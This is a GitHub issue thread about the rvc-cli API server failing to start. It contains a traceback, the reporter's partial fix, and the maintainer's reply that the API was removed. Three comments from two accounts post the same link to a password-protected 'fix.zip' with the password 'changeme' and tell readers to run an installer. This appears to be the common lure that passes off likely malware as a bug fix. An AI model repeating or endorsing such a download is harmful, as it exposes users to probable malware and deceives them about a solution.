### ISSUE TITLE
[BUG] The api server is not starting

### ISSUE THREAD

**Issue by ytoaa** [blaisewf/rvc-cli#75]
C:\Users\gas\Documents\AIproject-sub\rvc-cli>env\python.exe rvc_cli.py api
An error occurred during execution: expected str, bytes or os.PathLike object, not int
Traceback (most recent call last):
  File "C:\Users\gas\Documents\AIproject-sub\rvc-cli\rvc_cli.py", line 1704, in main
    run_api_script(
  File "C:\Users\gas\Documents\AIproject-sub\rvc-cli\rvc_cli.py", line 576, in run_api_script
    subprocess.run(command)
  File "C:\Users\gas\Documents\AIproject-sub\rvc-cli\env\lib\subprocess.py", line 505, in run
    with Popen(*popenargs, **kwargs) as process:
  File "C:\Users\gas\Documents\AIproject-sub\rvc-cli\env\lib\subprocess.py", line 951, in __init__
    self._execute_child(args, executable, preexec_fn, close_fds,
  File "C:\Users\gas\Documents\AIproject-sub\rvc-cli\env\lib\subprocess.py", line 1360, in _execute_child
    args = list2cmdline(args)
  File "C:\Users\gas\Documents\AIproject-sub\rvc-cli\env\lib\subprocess.py", line 565, in list2cmdline
    for arg in map(os.fsdecode, seq):
  File "C:\Users\gas\Documents\AIproject-sub\rvc-cli\env\lib\os.py", line 822, in fsdecode
    filename = fspath(filename)  # Does type-checking of `filename`.
TypeError: expected str, bytes or os.PathLike object, not int

Anyway, I fixed the wrong part of the code from the top
"--port",
str(port),
Execution Results

C:\Users\gas\Documents\AIproject-sub\rvc-cli>env\python.exe rvc_cli.py api --host 127.0.0.1 --port 8081
ERROR: Error loading ASGI app. Could not import module "api".

Has the API not been implemented yet?

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by blaisewf** [comment]
api was removed, you can create one with fastapi
